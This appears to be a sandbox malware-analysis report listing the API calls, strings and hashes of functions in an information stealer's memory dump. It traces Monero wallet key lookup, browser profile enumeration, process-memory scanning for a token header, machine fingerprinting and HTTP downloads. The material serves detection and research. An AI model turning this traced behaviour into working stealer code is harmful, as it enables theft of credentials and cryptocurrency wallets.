                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                    • Opcode ID: f0b5f581fed10edef51dfef6d1f6c2a495bb918cc99b8adf69391641848679d5
                                                                                                                                                                                                                                                    • Instruction ID: d9accbe6c05d182cea38f1a7832678247f6e6f1013faaf62aa86627fe16bc035
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0b5f581fed10edef51dfef6d1f6c2a495bb918cc99b8adf69391641848679d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36C1EB75800209BBCB14EBA5DD85EEE7779AF14304F00416EF506B3292EF389B49CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404B7B
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404B82
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404BA0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00404BB6
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BE1
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00404C1B
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404C40
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C52
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404C74
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404CE4
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D15
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D1F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00404D29
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: GET
                                                                                                                                                                                                                                                    • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                    • Opcode ID: 10fba125b52c53bc4a6c6711d864ecfe3de4c648aed4fc0020dfca006d60d7d5
                                                                                                                                                                                                                                                    • Instruction ID: 81e5f17cc12bb17e4ae93cf02df35bcb861b0150f87df068acd63c6663157ddd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10fba125b52c53bc4a6c6711d864ecfe3de4c648aed4fc0020dfca006d60d7d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036176B5A00219ABEB20DB94DC45FEF77B9EB49B10F104129FA15F72C0D778A904CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401CA4
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401CBA
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401CC1
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004020C5), ref: 00401CDE
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(004020C5,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401CF8
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401D10
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401D1D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401D38
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401EBD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                    • API String ID: 1905561306-218353709
                                                                                                                                                                                                                                                    • Opcode ID: 77bdd9d0a783aa6754d65fc02952459317b2051bd720cf6b6c68d20e3c3f83c4
                                                                                                                                                                                                                                                    • Instruction ID: 54ad93142447118491acc52e9b3620915a549fb7fce45cb0df2b52846e244455
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77bdd9d0a783aa6754d65fc02952459317b2051bd720cf6b6c68d20e3c3f83c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98718E71900248EADB14EBE4DC46BEEBB78AF18704F14416EF606731D1DB782608CB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000000,015C66D8,00000000,00020019,00000000,00426ED7,?,00000001), ref: 0041070F
                                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(00000000,?,?,8sB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041076E
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410797
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107B5
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,015D1FD0,00000000,000F003F,?,00000400), ref: 004107E5
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004107FA
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,015D2090,00000000,000F003F,?,00000400,00000000,004215C1,?,00000000,?,00426F08), ref: 0041087E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: - $%s\%s$8sB$8sB$?
                                                                                                                                                                                                                                                    • API String ID: 1989970852-2223034584
                                                                                                                                                                                                                                                    • Opcode ID: 6e9cc29cedf02d5a0232320bc201b4376dfe0e9eb4ff36cf6f91603027a30d76
                                                                                                                                                                                                                                                    • Instruction ID: aee864b9c10349cba499ed31a837307aac5521d20f6d4224747c876d86ab36c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9cc29cedf02d5a0232320bc201b4376dfe0e9eb4ff36cf6f91603027a30d76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83815E7590422DABCB14DB95DC44EEEB7B9FF48704F10416DE505B3281DB386A08CBB4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9FB
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FA23
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FA44
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA80
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FADB
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FB2E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FB7A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • N0ZWFt, xrefs: 0040FB29, 0040FB39
                                                                                                                                                                                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FA96, 0040FB93
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                    • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                    • Opcode ID: 0362846326ce71ba734d08fdefbe86055a277bf58da8f0d7c609a77d097183f7
                                                                                                                                                                                                                                                    • Instruction ID: 4d812e00ed7efdfc56fa22d6bf2b9f094a19d0319c757135d16d31f26b2875e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0362846326ce71ba734d08fdefbe86055a277bf58da8f0d7c609a77d097183f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18610271E00218ABEB30DBA4DC41BAFBA74AB44714F14453EF514776C1E77CA9488BA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410CE1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00426EB0), ref: 00410CF0
                                                                                                                                                                                                                                                      • Part of subcall function 00410B80: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410D12
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410D40
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                    • String ID: :\$C$j{A$j{A
                                                                                                                                                                                                                                                    • API String ID: 2389002695-2806685657
                                                                                                                                                                                                                                                    • Opcode ID: c6907f57d7b0b69bcad3f68aaa3f2a3ed4104bf728b3a5d81b859def5555cabf
                                                                                                                                                                                                                                                    • Instruction ID: 893894b04ace3980e62bb0b39723af3ebf7b8317acdb5c29f8884fc3d2c6ee9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6907f57d7b0b69bcad3f68aaa3f2a3ed4104bf728b3a5d81b859def5555cabf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3418371900219ABDB10EBE4DD45BEEBBB8EF09704F10056EF905B7281DB786A44CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413A94
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421BF9), ref: 00413AAB
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00413AD7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413AEC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413B06
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                    • String ID: C!B$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 2440237315-1759700572
                                                                                                                                                                                                                                                    • Opcode ID: 0e96a8b856b38cccec0c7ba89ec05b24b9087011dda1fe97d8b3b3eefa9808aa
                                                                                                                                                                                                                                                    • Instruction ID: 40921d6adc212886bccc595fd23395ae8b4e37a6a44f56a5cdb0f7e06a1c4b2a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e96a8b856b38cccec0c7ba89ec05b24b9087011dda1fe97d8b3b3eefa9808aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5051A630904258EADB10EFA5C9567DDBBB4AF19704F5040BEE805736C2DB7C6B08C7AA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405805
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,0000000B), ref: 00405831
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405856
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405879
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405892
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,000000FF,0041FBF8,00000000,?,?,?,?,?,?,0000000B), ref: 004058B6
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004058E0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 004058FC
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405903
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040590A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 105467990-0
                                                                                                                                                                                                                                                    • Opcode ID: b8c26ef3a759278d12ad385f4820563cbe0f669783da83bf6f96172ec7b81140
                                                                                                                                                                                                                                                    • Instruction ID: 67065f954d04ca421b3934db226f8f0ea0d84fdb2a9ebb2b369e2f00a31ea7dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8c26ef3a759278d12ad385f4820563cbe0f669783da83bf6f96172ec7b81140
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C519475500315ABEB10EBA0CC49FEE7779EF05B04F108569FA05B71C1DB78AA08CBA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040E8E2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF830,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040EA06
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800), ref: 0040EBA4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810), ref: 0040EC9D
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$lstrlen
                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                    • API String ID: 2762123234-4033978473
                                                                                                                                                                                                                                                    • Opcode ID: d34c7f22af68a44a1b0b565ca0b46956f80fdb63cf0c2f1a33097986982441e7
                                                                                                                                                                                                                                                    • Instruction ID: 5534e76143be8b419ec7238555623ea169a4391ec5e5bf997c27e7e318c1e1c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d34c7f22af68a44a1b0b565ca0b46956f80fdb63cf0c2f1a33097986982441e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42326B74900748DFCB14EFA9C545ADEBBF5BF48304F10852EE85AA3791D734AA08CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040E8E2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF830,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040EA06
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800), ref: 0040EBA4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810), ref: 0040EC9D
                                                                                                                                                                                                                                                      • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
